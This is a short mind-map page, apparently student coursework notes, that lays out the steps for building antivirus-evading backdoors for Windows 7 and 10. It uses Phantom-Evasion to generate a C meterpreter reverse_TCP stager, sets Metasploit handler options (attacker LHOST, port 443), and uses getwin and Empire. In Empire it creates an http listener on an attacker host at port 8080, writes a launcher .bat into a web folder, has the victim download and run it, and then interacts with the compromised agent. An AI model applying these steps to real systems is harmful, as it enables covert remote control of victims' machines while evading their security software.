Please enable JavaScript.
Coggle requires JavaScript to display documents.
bypass antivirus (phantom for both x64,x86 win10 and win7 (metasploit…
bypass antivirus
phantom for both x64,x86 win10 and win7
[1] Windows modules
[2] Stager
[3]X86 stagers
[4] C meterpreter/reverse_TCP HeapAlloc
[5]Please insert LHOST: attacker ip
[6]Please insert LPORT: 443
[7]Please insert output filename: file
[8]Add multiple processes behaviour?(y/n): n
[9]Strip executable? (y/n): y
metasploit
[1]set LHOST attacker ip
[2]set LPORT
[3]run
getwin only for x86 tested on win7
[3]sending link to target
[2]payload name
[1]selecting port number
[4]
getwin built-in listening
empire tested on win7 x86
Stagger
usestager windows/launcher_bat
set listener name & OutFile
set Listener http
set OutFile /var/www/html/evil-files/empire_http_8080.bat
1.Creating Listeners
dbx,http,metrpreter
uselisterner http
set Host & Port
set Host
http://attacker
ip
set Port 8080
execute
3.goto victim machine download & run the backdoor file
it bypass the antivirus
4.agent intraction
interact xyz
info about hacked machine
SP19-RIS-021 ,SP19-RIS-026